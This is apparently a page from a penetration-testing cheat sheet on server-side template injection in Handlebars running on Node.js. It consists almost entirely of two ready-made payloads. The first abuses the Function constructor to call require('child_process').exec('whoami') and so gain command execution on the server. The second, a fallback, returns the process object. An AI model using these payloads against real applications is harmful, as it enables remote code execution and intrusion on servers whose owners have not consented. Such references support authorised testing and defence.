PAYLOAD

REQUIRE()

this may not always work. in such cases, utilize the "process" object

{{#with "s" as |string|}}
  {{#with "e"}}
    {{#with split as |conslist|}}
      {{this.pop}}
      {{this.push (lookup string.sub "constructor")}}
      {{this.pop}}
      {{#with string.split as |codelist|}}
        {{this.pop}}
        {{this.push "return require('child_process').exec('whoami');"}}
        {{this.pop}}
        {{#each conslist}}
          {{#with (string.sub.apply 0 codelist)}}
            {{this}}
          {{/with}}
        {{/each}}
      {{/with}}
    {{/with}}
  {{/with}}
{{/with}}

PROCESS

{{#with "s" as |string|}}
  {{#with "e"}}
   {{#with split as |conslist|}}
     {{this.pop}}
     {{this.push (lookup string.sub "constructor")}}
     {{this.pop}}
     {{#with string.split as |codelist|}}
       {{this.pop}}
       {{this.push "return process;"}}
       {{this.pop}}
       {{#each conslist}}
         {{#with (string.sub.apply 0 codelist)}}
           {{this}}
         {{/with}}
       {{/each}}
     {{/with}}
   {{/with}}
 {{/with}}
{{/with}}

PreviousHANDLEBARS NODEJS (EXPLOITATION)NextSSI INJECTION

Last updated 4 months ago